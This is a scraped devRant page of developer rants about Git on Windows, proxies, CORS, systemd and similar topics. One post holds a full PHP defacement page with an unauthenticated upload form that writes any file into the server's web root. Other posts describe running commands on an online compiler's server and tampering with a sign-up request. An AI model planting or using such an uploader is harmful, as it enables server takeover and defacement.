I made a bit of a tradition of building a list of hardware that's superior to whatever Crapple is releasing whenever Crapple releases something - and for the first time, I decided to make it public instead of just sharing it with some coworkers.
Making it public however took some time (luckily, yesterday was a holiday here, so I got it done now) - at least, making it looking "not like shit" took some time.
So enjoy my (very basic) bootstrap templated, yet possibly useful list of builds superior to the Crapple Rag Mini (which is a completely fictional entity not resembling any existing company in the world. Promise. Totally. Penguin's swear.)
The list can be found here - expect to see an update anytime Crapple pushes new shit to the market:
http://il-pinguino.com/superiortocr...
(possibly not safe for work, children, catholics and SJWs). Yeah, no SSL cert, currently. Hell, it's a private server, it doesn't process any of your info and it doesn't offer downloads... I might add one in the future.
I hope you can forgive my shameless self-promotion, it's not a commercial site, there are no ads/shitcoin miners on it and i don't get a share/cut/whatever - just a small humorous joke project. For now.
BTW: I didn't attempt to build any of those. It should work, but please don't sue me if it doesn't.5 -
So client wants an android app that implements some legacy Epson printer SDK, works on a chinese Windows device with an android Emulator on it, connects to local Webservice that had to be configurated and ran (local Network) , sends and tracks data, if Server down then handle it on the Client and reconnect as soon as Server up, running own TCP Server on Android device that listens for specific http requests, which make the android connect to an Epson printer to start printing. The stuff that is being printed? A png file that has to be converted to a Bitmap, a QR Code that has to be generated by the bugged base64 encrypted stuff coming via http in (webserver-> Android TCP server)
Dont forget the Software Design (MVP), documentation, research etc.. Im about to finish the app , its my 5th day on this Project, the 6th day was planned to be full testing. Client Calls me and ask me how far I am, I reply, he says ok. 30 minutes later he tells me he wont pay me next time that much because this work should take 3 days, or even 2. "A senior Android developer could do this in 2 days"... When i sent him my notices he called me a liar, his webdev has alot of experience and told him it should take 2-3 days...ffs2 -
http://".$_SERVER['HTTP_HOST']."/server, check the code below
<html lang='en-US'><head><title>T3RR0R B@B@</title>
<a href="https://www.facebook.com/mr.T3RR0R" target="_blank"><h2>Click Here !</h2></a><br>
<style>
body{cursor:url("http:////"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
body {
background-color: #000000;
background-image: url(https://imgwm.com/images/...);
<!--http://twitrcover.com/ar/uploads/...-->
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-position:right top;
background-repeat:no-repeat;
background-size:110%
}
.style1 {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
</style><br><br><br>
<br>
<center><?php
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Ciee Sukses Uploadnya :* -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Ciee Sukses Uploadnya :* <b>$files</b> di folder ini";
} else {
echo "gagal upload >:(";
}
}
}
?>
<!DOCTYPE html>
<html>
<title>K.I.T.A</title>
<audio autoplay loop>
<source src="http://micro.byethost24.com/KITA.mp..."></source>
</audio>
<head>
<link href='https://fonts.googleapis.com/css/...' rel='stylesheet' type='text/css'>
</head>
<body bgcolor="#2b2b2b" link="gray" text="gray">
<center>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<br><br><br>
<div id="satu">
<embed src="https://youtube.com/v/tec_KllmOH4/...
<br>
<b style="font-size: 40px;">hacked by T3RR0R B@B@</b>
<br>
- use your brain to repair this system<br>
Scary Crazy Forbidden<br>
@2018<br><br>
Contact : fb.com/mr.T3RR0R
<br></div>11 -
Am I the only developer in existence who's ever dealt with Git on Windows? What a colossal train wreck.
1. Authentication. Since there is no ssh key/git url support on Windows, you have to retype your git credentials Every Stinking Time you push. I thought Git Credential Manager was supposed to save your credentials? And this was impossible over SSH (see below). The previous developer had used an http git URL with his username and password baked in for authentication. I thought that was a horrific idea so I eventually figured out how to use a Bitbucket App password.
2. Permissions errors
In order to commit and push updates, I have to run Git for Windows as Administrator.
3. No SSH for easy git access
Here's where I confess that this is a Windows Server machine running as some form of production. Please don't slaughter me! I am not the server admin.
So, I convinced the server guy to find and install some sort of ssh service for Windows just for the off times we have to make a hot fix in production. (Don't ask, but more common than it should be.)
Sadly, this ssh access is totally useless as the git colors are all messed up, the line wrap length and window size are just weird (seems about 60 characters wide by 25 lines tall) and worse of all I can't commit/push in git via ssh because Permissions. Extremely aggravating.
4. Git on Windows hangs open and locks the index file
Finally, we manage to have Git for Windows hang quite frequently and lock the git index file, meaning that we can't do anything in git (commit, push, pull) without manually quitting these processes from task manager, then browsing to the directory and deleting the .git/index.lock file.
Putting this all together, here's the process for a pull on this production server:
Launch a VNC session to the server. Close multiple popups from different services. Ask Windows to please not "restart to install updates". Launch git for Windows. Run a git pull. If the commits to be pulled involve deleting files, the pull will fail with a permissions error. Realize you forgot to launch as Administrator. Depending on how many files were deleted in the last update, you may need to quit the application and force close the process rather than answer "n" for every "would you like to try again?" file. Relaunch Git as Administrator. Run Git pull. Finally everything works.
At this point, I'd be grateful for any tips, appreciate any sympathy, and understand any hatred. Windows Server is bad. Git on Windows is bad.10 -
<opinion>
You may be a prod ninja but I believe that every dev should have a decent level of exposure with a low level language(s). Sure you can make an HTTP server, do a sentimental analysis, topic modeling, set up multinode clusters, write ORM queries from dbs and all sorts of awesome stuffs with Python/Ruby/PHP/JS/GO etc but none of them teaches you what happens at kernel level. Things like memory leaks, threading, multiprocessing, memory allocations etc can only be better learnt from a low level language.
</opinion>
P.S. Not a C/C++ fanboy. I'm a python dev 😄5 -
Ok so I have done some work with crypto currency mining pools and recently a client requested for me to make a splash page that showed data from multiple instances of these pools APIs. I went to find some documentation for this open source api and to my surprise there is none. I thought of querying the public API from the clients side and it worked, however it's so slow that the data shows up roughly 20 seconds after the page loads.
Easy fix right? Make a PHP server get the data every 5 seconds, cache it and serve the data with the page and use a websocket for live updates! Until I found out that there is no practical way in this garbage framework to get the damn API data without making an HTTP request or mutilating the original source code. I'm so done with this garbage framework. It literally loads pages based on a page and action parameter on the index.php. I quit.1 -
Just got a Google Home. I'm very impressed with it, there's just so many possibilities with it. I just found out I can trigger a HTTP request using my voice (!). So now I need to find out good use cases and build a server.
Ideas?7 -
After hours of development, updated code on server, closed ide, out of habbit oppened browser, went to http://localhost/, just to check how api is responding... No response. Restarted server. No response. 30 minutes of random tests/checks, no result at all. 30 nervous minutes later, realized that server was working fine... it's just me who freaking tried to access it via localhost. ffs 0_0
-
I once wanted to participate in a free activity that requires signing up for a crappy website.
Unfortunately all spots for the activity I wanted were filled, so I gave it a few minutes and it turned out that the registration is done by sending an HTTP request to a domain with all of the details. So I changed the activity details and selected the hours I wanted and boom - "Thanks for signing up with our site, did you like it ?" Yes.😈 -
F**king hate Windows for its insanely confusing proxy setup required for software development...
> Setup proxy in Windows network settings
> Then, setup HTTP_PROXY & HTTPS_PROXY environment variable at the system/user level.
> Followed by separate proxy settings for java, maven, docker, git, npm, bower, jspm, eclipse, VS Code, every damn IDE/Editor which downloads plugins...
> On top of everything, find out the domains which does not need to go through proxy and add them to NO_PROXY.. at each level..
> It does not end here. Sometimes, I need to setup proxy for SSH connections... like, if I have to use git with SSH and not HTTP/S... Uhhh....
More than half of the problems me and my dev team face is related to setting the right proxy. Why can't it be like, set in one place and everything picks up from there, like in any linux machine or for God's sake, a Mac ?
Worst of all is, my org uses a configuration script, which resolves into a list of proxy servers, from which one of them will be used. So, I need to download that script, find out which is the right proxy server and then, use it in all the aforesaid places... WTH ?????
Is this a common workplace problem for all developers ??? Will this be solved by Windows Subsystem for Linux ???9 -
Filling out IRS forms using the Brave browser in privacy mode:
---------
Access Denied
You don't have permission to access "http://sa.www4.irs.gov/modiein/...?" on this server.
Reference #18.cfc3117.1714401007.25a9c99f
https://errors.edgesuite.net/18.cfc...
---------
Filling it out using ridiculously non-secure regular Chrome browser which exposes bookmarks, history, and cookies to anyone with enough knowledge:
"Right this way, sir. Don't worry, your data is in safe hands. We're totally not mining your data for leverage against you for your political leanings in a future tax audit."3 -
Fuck you apache server...
Why did your dumb ass developers decide it was a good idea to not support "expect 100 continue headers". I seriously suspect that the devs were high smoking dragon dildo ashes like they were getting ready to get a whole chair shoved up their asses.
I wasted alot of time thinking i was getting a 417 http code because i fucked up my API implementation... No, it was the dumb apache server that decided to give me the finger.
Also, whoever built the HttpClient for .net framework 4... Fuck you too for automatically adding that dumb header to PUT requests and not properly documenting this or allowing for it to be disabled in a non hacky way.
I appreciate and enjoy solving coding problems... I, however, can't stand dumb decisions like the two above. -
tldr: my classmates suck and I hate them
We study cs in school, and my classmates are super dumb.
Here is an example from today:
The task: build an http server in python, using sockets.
My classmates: writes everything in the main function, uses try-expect for everything and every error possible, nothing works, nothing worked after a week.
Me: properly separated to different functions, used goddam regrx to get data from requests, used asyncio to make sure it can handle multiple requests at the same time, everything worked after 2 hours.
But, and here is the problem, after I finish they ask me a bunch of dumb, 'Just Google it dude' questions and they call me condescending because I get mad after the second hour of teaching them the same thing.
Once they told me:"you think you are a better programmer then us" and I just want to say this out loud: I AM A BETTER PROGRAMMER THEN THEM, THEY ARE THE PERFECT EXAMPLE OF HOW YOU SHOULDN'T DO ANYTHING AND I HATE THEM.
That's it, I'm done. I feel much better now.
PS: it's okay to suck at programming, but please stop thinking that everyone who's better than you is condescending.4 -
I would like to call out the moron who decided to control docker through HTTP when the maximum time the server can take to finish the task is longer than the HTTP timeout.
If you expect things might time out, you don't use a HTTP request. You use a resource and poll it, or Websockets, or possibly SSE.
Shoehorning your API into a frame that obviously doesn't fit doesn't help anyone. Just admit that you don't know what HTTP is and use a regular TCP socket with regular pings.2 -
The moment you realize that you have successfully beaten reality with your unit-tests...
There are unit-tests for ...
... the api returning a 408 Http StatusCode when an internal request times out.
... the react app take this status-code and fires an action to display a specific error message for the user.
Every bit of code runs just fine.
Deploy this hell of an app on the server. Dandy Doodle.
Do a smoketest of the new feature.
FAIL!
Chrome starts to crumble during runtime. The api Request freezes.
Firefox takes the 408 api response but fails to interpret it in react app.
So I began to wonder, what the hell is going on.
Actually I recognized that I had the glorious idea to return a clientside error code in a serverside api response.
Glorious stupidity :/
Finally I fixed the whole thingy by returning an 504 (Gateway timeout) instead of 408 (Clientside timeout)
Cheers!2 -
CORS is shit
Stupid useless shit that protects from nothing. It is harmful mechanism that does nothing but randomly blocks browser from accessing resources - nothing more.
Main idea of CORS is that if server does not send proper header to OPTIONS request, browser will block other requests to that server.
What does stupid cocksuckers that invented CORS, think their retarded shit can protect from?
- If server is malicious, it will send any header required to let you access it.
- If client has malicious intents - he will never use your shit browser to make requests, he will use curl or any ther tool available. Also if server security bases on something as unreliable as http headers it sends to the client - its a shit server, and CORS will not save it.
Can anyone give REAL examples when CORS can really protect from anything?33 -
Made my own "devRant" ("inspired hehe") Android app/socialmedia^^
(still in BETA) Not targeting a specific area though. http://stardash.de:4000/
And no not a devRant replacement cuzz its not soo much dev Related :)
Layout has no similarities aT aLl :D
App can only be downloaded on my website cuzz im not 18 yet so i cant publish to the playstore (and also i kinda dislike Google and using anything Google connected in a app e.g. Firebase)
There is a build in update center in the app though.
Server:
My Pc (Linux)
Nodejs with Express
Mysql
App:
Android Studio mostly with Retrofit13 -
Discovered this dumb backdoor into http://tutorialspoint.com/codinggro... months ago (June 2019). It's in Project>Compilation Options
It lets you execute any command on their server. I found a lot out:
The system is Red Hat based (Fedora/CentOS/RHEL)
It uses Linux kernel 3.20
It has 251GB of RAM
It has an 800GB HDD
Its IP is 172.17.0.2
Its main username is cg
It uses systemd init8 -
~rant
I think we need to change way how websites deliver themselves to its users. This HTML CSS JS clusterfuck is just a huge PITA in the ass.
What is a website?
It's an application where users find, communicate or share information, can buy or sell their penis pumps and loads of shady stuff.
Why must a website (the delivered application) be split into multiple languages/scripts and lots of HTTP requests?
In my opinion, PWA is a start to make us look at websites more like apps as we are used to on the machine, but they don't solve the mess.
Per my experience, many people working on websites regularly confuse what's executed on the server and what is on the client. They send data to the client via XHR, for example full DB tables of private data, just to then filter it in their beloved Array.filter function.
You can tell those people again and again and this is why I start thinking that the Web, as we know it, needs a big change.14 -
Sharing a first look at a prototype Web Components library I am working on for "fun"
TL;DR left side is pivot (grouped) table, right side is declarative code for it (Everything except the custom formatting is done declaratively, but has the option to be imperative as well).
====
TL;DR (Too long, did read):
I'm challenging myself to be creative with the cool new things that browsers offer us. Lani so far has a focus on extreme extensibility, abstraction from dependencies, and optional declarative style.
It's also going to be a micro CSS framework, but that's taking the back-seat.
I wanted to highlight my design here with this table, and the code that is written to produce this result.
First, you can see that the <lani-table> element is reading template, data, and layout information from its child elements. Besides the custom highlighting code (Yellow background in the "Tags" column, and green gradient in the "Score" column), everything can be done without opening even a single script tag.
The <lani-data-source> element is rather special. It's an abstraction of any data source, and you, as a developer can add custom data sources and hook up the handlers to your whim (the element itself uses the "type" attribute to choose a handler. In this case, the handler is "download" which simply sends a fetch request to the server once and downloads the result to memory).
Templates are stored in an html file, not string literals (Which I think really fucks the code) and loaded async, then cached into an object (so that the network tab doesn't get crowded, even if we can count on the HTTP cache). This also has the benefit of allowing me to parse the HTML templates once and then caching the parsed result in memory, so templates are never re-parsed from string no matter how many custom elements are created.
Everything is "compiled" into a single, minified .js file that you include on your page.
I know it's nothing extraordinary, but for something that doesn't need to be compiled, transpiled, packaged, shipped, and kissed goodnight, I think it's a really nice design and I hope to continue work on it and improve it over time1 -
Today I have created a server application on Python Tornado which can forward TCP Packets directly to HTTP request queue without any intermediate caching.
Our remote IOT devices (microcontrollers with sensors attached) send sensor reading over TCP Socket to our server and all the connected web applications can show the data instantly using long polling and the above mentioned technique.1 -
Optionsbleed - HTTP OPTIONS method can leak Apache's server memory
https://blog.fuzzing-project.org/60... -
Here is a helpful link to quickly test and run php codes without your local server. http://phpfiddle.org4
-
The company I work in had to build a software that establishes a connection to a MySQL database running on an external server. It doesn't work for the client company because the firewall is very restrictive and only lets through connections on port 80, so we had to build a fucking http server that forwards SQL queries to the MySQL server and returns the result. This is so horrible!
(Running MySQL on port 80 isn't an option as any other connection type than http is blocked by the firewall)8 -
In last episode of "How SystemD screwed me over", we talked about Systemd's PrivateTMP and how it stopped me from generating SSL certificates.
In today's episode - SystemD vs CGroups!
Mister Pottering and his team apparently felt that CGroups are underused (As they can be quite difficult to set up), and so decided to integrate them into SystemD by default. As well as to provide a friendlier interface to control their values.
One can read about these interactions in the manual page "systemd.resource-control"
All is cool so far. So what happened to me today?
Imagine you did a major system release upgrade of a production server, previously tested on a standalone server. This upgrade doesn't only upgrade the distribution however, it also includes the switch from SysVInit to SystemD. Still, everything went smooth before, nothing to worry now then, right? Wrong.
The test server was never properly stress-tested. This would prove to be an issue.
When the upgrade finishes, it is 4 AM. I am happy to go to bed at last. At 6 AM, however, I am woken up again as the server's webservices are unavailable, and the machine is under 100% CPU load. Weird, I check htop and see that Apache now eats up all 32 virtual cores. So I restart it, casting it off to some weird bug or something as the load returns to normal.
2 hours later, however, the same situation occurs. This time, I scour all the logs I can, and find something weird - Many mentions that Apache couldn't create a worker thread? That's weird.
Several hours of research and tinkering later, I found out the following:
1 - By default, all processes of a system that runs SystemD are part of several CGroups. One of these CGroups is the PID CGroup, meant to stop a runaway process from exhausting all PIDs/TIDs of a system.
This limit is, by default, set to a certain amount of the total available PIDs. If a process exhausts this limit, it can no longer perform operations like fork().
So now, I know the how and why, but how should I solve this? The sanest option would be to get a rough estimate of just how many threads the Apache webserver might need. This option, though, is harder, than apparent. I cannot just take the MaxRequestsWorkers number... The instance has roughly double the amount of threads already. The cause being, as I found out, the HTTP/2 module, which spawns additional threads that do not count towards this limit. So I have no idea what limit to set.
Or I could... Disable the limit for just the webserver via the TasksAccounting switch. I thought this would work. And it did seem to... Until I ran out of TIDs again - Although systemctl status apache2.service no longer reported the number of tasks or a task limit of the process, the PID CGroup stayed set to the previous limit. Later I found out that I can only really disable the Task Accounting for all the units of a given slice and its parents.
This, though, systemctl somewhat didn't make apparent (And I skimmed the manual, that part was my fault)
So... The only remaining option I had was to... Just set the limit to infinite. And that worked, at last.
It took me several hours to debug this issue. And I once again feel like uninstalling systemd again, in favor of sysvinit.
What did I learn? RTFM, carefully, everything is important, it is not enough to read *half* the paragraph of a given configuration option...
Oh, and apache + http/2 = huge TID sink. -
I built my first web server literally from scratch (standard socket lib) today! In Python <3.
It is able to execute php and get the stdout to use it in the Python script afterwards and make use of parallel connections.
Now to the real rant...
I am using HTTP/1.1. I want to use h2 (aka HTTP/2) tho. I am stuck on this. Found the papers to the specs of the h2 and spdy protocols, but they are not really helpful.
Is anyone good in this field? Please let me know :/3 -
Today I spent 9 hours trying to resolve an issue with .net core integration testing a project with soap services created using a third party soap library since .net core doesn't support soap anymore. And WCF is before my time.
The tests run in-process so that we can override services like the database, file storage, basically io settings but not code.
This morning I write the first test by creating a connected service reference to generate a service client. That way I don't need to worry about generating soap messages and keeping them in sync with the code.
I sent my first request and... Can't find endpoint.
3 hours later I learn via fiddler that a real request is being made. It's not using the virtual in-process server and http client, it's sending an actual network request that fiddler picks up, and of course that needs a real server accepting requests... Which I don't have.
So I start on MSDN. Please God help me. Nope. Nothing. Makes sense since soap is dead on .net core.
Now what? Nothing on the internet because above. Nothing in the third party soap library. Nothing. At this point I question of I have hit my wall as a developer.
Another 4 hours later I have reverse engineered the Microsoft code on GitHub and figured out that I am fucked. It's so hard to understand.
2 more hours later I have figured out a solution. It's pure filth..I hide it away in another tooling project and move all the filth to internal classes :D the equivalent of tidying your room as a kid by shoving it all under the bed. But fuck it.
My soap tests now use the correct http client with the virtual server. I am a magician.4 -
Change code here, 500
Revert and change code there, 403
Revert and change code at both the places, 404
Revert and have a Potato -
I have solved one of the hardest problem in my life.
I cannot figure out why I cannot send a get request to the server. I want to give up after trying to solve the problems for 4 hours. But I didnt. And I found out why. it is because I didn't put http:// in front -
GET Requests with a BODY as a payload are legit and stop living in denial!
TALKING TO YOU ANGULAR!
I'm fucking sick of seeing ignorant people(on SO or GitHub) coming up with the generic advice, on HTTP GET issues with having a BODY as a payload, to don't do that or you shouldn't, yadayadayada.
It's not a fucking issue at all in general, because as RFC-7231(https://tools.ietf.org/html/...) sais:
"A payload within a GET request message has no defined semantics; sending a payload body on a GET request might cause some existing implementations to reject the request."
So, if your fucking server can't handle them(aka living in the past), [rest] in peace and suck it up!
(ps, I happen to use modern servers)
But why should you limit a fucking front-end framework(ex. Angular) in the first plate to being able to send such requests?!
It's a moronic limitation and the person or team responsible for it are at least clueless and as far the issue has reappeared through time, for how old is Angular, they didn't move an inch.14 -
Trying to implement WebRTC for Voice chat in the company app in Unity.
Pros:
- it's super fucking fast
- it kinda is peer to peer
Cons:
- WebRTC comes in very different ways and therefore you either need to properly config the server or change the way the app works
- Each signaling server might have different config so you can't even connect to different servers like you do for http, ftp and so on
- You need to use a server to know each peer
- You need to use another server to make the actual messages go through
- None of it seems to actually be p2p except the fact that you will need to make a different connection to each and every other client in the conference
So basically it was engineered to be as compatible as possible and therefore no server-side default was defined in the protocol, which means it won't ever be actually very compatible with anything at all since everyone will make its configuration.
Fuck me, fuck WebRTC and fuck this whole shit1 -
FFS! having nodejs server on heroku, added certificate successfully for https, yet when going to www.example.com it uses http on prod and maintanence page while example.com goes to https.
All my attempts to catch http connection failed.
This is the definition of me wanting to bang my keyboard and problem autosolves itself while I am doing it!
Where is the my one click and everything is ready. I want to code back end and front end not spend 2 days trying to figure out https bullshit for unknown reason. -
Okay, if I understand correctly, if you want your website to be RGPD compliant, you must wait for user opt-in before storing anything to their device.
Maybe I'm asking myself too much questions but, how exactly does this work for a PWA ? Should you ask user for permission before starting a service worker and/or before caching any content ? If so, what if the user refuses the authorization ? The app is broken ? Or it just fallback to good old http browsing if it's server-rendered ?3 -
Urgh.. the amount of things you have to know as a developer.. it can get stressful and frustrating sometimes when (in-depth) technology knowledge is demanded from you (for instance, for a job position)..
It's like being a doctor, being a lifelong student.
A few examples of what I had to know during my career:
Java, .NET, Python, PHP, JavaScript/HTML5/CSS3, Sass/Less, Node.js, ReactJS, AngularJS, Vue.js, Cordova, Ionic, Android, design patterns, SOLID, databases (design, implementation, administration, both NoSQL and relational,..), deployment tools (Octopus, Jenkins,..), VCS, CI/CD, HTTP, networking, security (OAuth2, CORS, XSS, CSRF,..), algebra, algorithms, software testing, profiling, Linux, Unix, Windows, MS Office (advanced mail filtering,..), ITIL, IT Law (licensing and its implications when choosing a product, distribution right,..), server architecture,..
Sure yeah, I know, I've studied all that at university but.. it's been too long (almost a decade now). I have to revisit that knowledge.5 -
I needed a tool that was super simple to transfer email from a non-cpanel server to a new WHM-based VPS. Ended up coding one and launched http://transfermyemail.ca - have had a few server companies jump on board because they needed migration tools too! Was it worth it from a development time point of view? Not yet...maybe next year :)
-
I hate this feeling.
Changing stuff with a greamripers scythe around my neck called doubt because the available data isn't too convincing.
Then having to go big or nothing as it is an ecosystem change (e.g. changing the cipher suites of TLS, changing protocol - e.g. HTTP 1.1 to 2) so it needs to be consistent as otherwise fun stuff could happen (fun as in the grim reaper cuts off my neck except a few centimeters and plays "now your head is off, now your head is on" ).
To top it off - just few seconds after the change has happened people coming up in the support channel.
My hands are - mysteriously - not sweaty then. Rather cold.
Lil prayer to the heavens and getting the whiskey bottle...
Opening an ongoing discussion in support channel....
And they're discussing whether the page needs to have an additional arrow for going back to the last page or if the default page navigation is enough.
Constantly using @all so everyone gets pissed off due to being pinged every few seconds in a channel that was meant for emergency support.
Now my hands go from a dark red to a bright red, my nostrils flare out, my adrenaline goes through the roof and I literally wanna murder people....
Those days.
I hate those days.
And I hate the timing of some people...
Like they're deliberately fucking with me without knowing it, like the universe told them explicitly to do so just to fuck with me.
*gooozfraba*
And of course, everything else is fine and running smooth like butter, except that said discussion now goes on in a total flamewar so I get even more pings.
Sucks to be in management.
You have way to many rooms where people can annoy you.
To top it off - after being grumpy and pissed and angry for people just annoying the fuck out of me, I have to mediate.
Yeah. Cause the usual person is on vacancy.
*slowly strangling the whiskey bottle like homer does with bart*
Turns out after 15 mins listening to enraged UX designer vs Frontend Team Lead that UX designer meant a completely different thing - uploaded wrong screenshot, whole discussion was unnecessary.
*Nah. Fuck it. Drinking whiskey*
Reminding everyone what the fucking frigging support channel is meant for and that penis fights aka who got the longest schlong don't belong there....
"Yeah it was a mistake, but it wasn't so bad"
...
You pinged fucking 32 people like it was the end of the world, you ignorant fucktwads.
For over 5 mins.
For fucking frigging nothing except your tiny dicks and shitty egos.
*Second round of whiskey*
Back to work after a wasted half hour.
What says monitoring?
Ah. Everything's working.
At least luck hasn't failed me.
Good server. Brave server.
Then I hear this lil voice in my head: no.
The servers know your personality.
They're afraid. Terrified.
Somehow that thought makes me giggle always...
Childish? Maybe. But it helps on those days.... Funnily enough, remaining 3 hours noone said anything in any chat channel.
"I wonder why, I wonder how...."... *hum* -
It would be a pleasure for me if you guys would give me a rate for a website ive just uploaded to the live server. It's responsive but german. If you have better options, for some functionalities, i am open for better ideas.
http://www.lagus.de17 -
Hey Guys
Today I'm bringing a tool for you guys, mount servers with old phones Or have servers in your phone for testing.
Tool: Servers Ultimate Pro
Web:: https://icecoldapps.com/app/...
Note1.: Doesn't handle well above android 6+, So test one of the free servers you're intending to use before buying.
Note2.: This App costs around 10€/$ but you can get single App servers for free (I think even html + php + mysql package for free).
Not promotional, I'm just a user that loves this App.
I already talked about this a few times (usually I just call the cell phone I'm using my web server), but as a noob I don't even knot the possibilities.
This App comes with more then 70 protocols (60+ servers and a mix of servers).
From ssh, ftp, html (nginx, lightppd, Apache, simple) with php and mysql, Webdav...
<quote>
Run over 60 servers with over 70 protocols!
Now you can run a CVS, DC Hub, DHCP, UPnP, DNS, Dynamic DNS, eDonkey, Email (POP3 / SMTP), FTP Proxy, FTP, FTPS, Flash Policy, Git, Gopher, HTTP Snoop, ICAP, IRC Bot, IRC, ISCSI, Icecast, LPD, Load Balancer, MQTT, Memcached, MongoDB, MySQL, NFS, NTP, NZB Client, Napster, PHP and Lighttpd, PXE, Port Forwarder, Proxy, RTMP, Remote Control, Rsync, SMB/CIFS, SMPP, SMS, Socks, SFTP, SSH, Server Monitor, Stomp, Styx, Syslog, TFTP, Telnet, Test, Time, Torrent Client, Torrent Tracker, Trigger, UPnP Port Mapper, VNC, Wake On Lan, Web, WebDAV, WebSocket, X11 and/or XMPP server!
</quote>8 -
I ask everyone to hack my web-server located at the following address. See not HTTPS. It is open to all
http : // 127.0.0.13 -
I‘m currently writing a http proxy server (something like the proxy mod in Apache, but more special). One the one hand is is nice that HTTP 1.1 can use one TCP connection multiple times, but on the other hand it is very annoying. Because I need to rewrite the Host header. And therefore I need the start of the HTTP header. I solved it after some time, but now my code is more complicated than before.
-
Hi there, i'm new to AWS. i've running my python code in Lambda. Basically it's calling an http-request and processing the responding JSON to a CSV file. Now, what is the easiest way to transfer that CSV file to a 3rd party FTP Server?7
-
so some controversial opinions
Our company is moving most of our code style to snake_case, even the JavaScript. Here's our resoning:
Take the CustomerAccountMembership model. In our Python server, we would access it as obj.customer_account_membership, in JavaScript as obj.customerAccountMembership and our API endpoint as api/path/customer-account-membership. Thus we had several String utility functions such as `camelize`, `kebabChop` (which is ironically camelCased) and `snakeify`, and we would use them in translating from URL path to JS to Python, which was troublesome.
Now HTTP allows _underscores_ unescaped and do not pose any significant meaning. JavaScript also accepts it as a valid character in variable names. On the other hand, HTTP is strictly lower-cased, and all computer languages use the -dash- to signify subtraction. Sooo the _underscore_ is the only style that is compliant everywhere.
Unless, of course, we go with customeraccountmembership, which I refuse to do.
I'm not that deep into code character rules.
Opinions?7 -
Technical question that I just cant find the answer to anywhere.
I have a load balancer and want it to pass the IP of the original caller to the server. Usually it is done by modifying the header? of the Request HTTP packet? and adding X-Forwarded-For: ....
The LB team though says it needs to modify X-Originating-IP and somehow causes a noticeable impact of the speed of all requests.
I don't know the details but it should only modify the first Packet that has the HTTP headers and should be appending X-Forwarded-For. If only need to modify the Header packet, how can it slow down the whole interaction so much:
-Adds 100ms to a 200ms request
-Increases a 10 minute download to like 20-30 minutes6 -
One of the most headache-inducing things about being a developer is having to find a solution to every little ailment that software has.
An example would be: working with a particular stack. LEAN, MEAN, LAMP, WAMP,.. The nightmare of having to deal with every single error in PHP, NodeJS, Apache Server, Nginx, the HTTP spec intricacies, the HTML5 spec, API problems..
Sometimes it's just a lot to deal with and I'm trying not to lose my patience.9 -
To be a Java (or other business popular language) developer
* Java 6, 8 and features up to 14
* SQL + nosql
* Caching
* Logging eg log4j2,
* Searching eg elastic stack
* Reactive
* Framework (at least 1, but hey, knowing 1 is lame..)
* Networking or at least base http knowledge
* Tomcat, jboss or other shit
* Aws, heroku, GCE or other SAAS/paas
* Rest, RPC, soap
* Business Hello World example
* Hexagonal Architecture
* TDD
* Ddd
* Cqrs
* 12 app factor
* Solid
* Patterns
* docket
* Kubernetes
* Microservices
* Security, oauth2
* concurrency
* AMPQ
* Cloud
* Eureka or consul as service Discovery
* Config server
* Hazel cast
*
*
* Endless story ...
Then we can start hello word app2 -
I am the responsible for the atlassian Suite at work, as I maintain the systems, set them up, and stuff.
One day, our crowd (the authentication and authorization application) just went crazy. At like lunch time it could not connect to the AD anymore. No reasons. Throwing XSRF errors (cross site scripting), because http would connect to https. "won't do it, fuck you" it told me. Out of the blue. Noone changed anything. And yea, seriously. Noone did.
It just refused to connect (as connecting to AD is connecting yourself with you own api. And refusing yourself talking to yourself). It runs behind a proxy. Therefore http/https. Well, this worked for years. But out of sudden not anymore.
Yea. Fuck you.
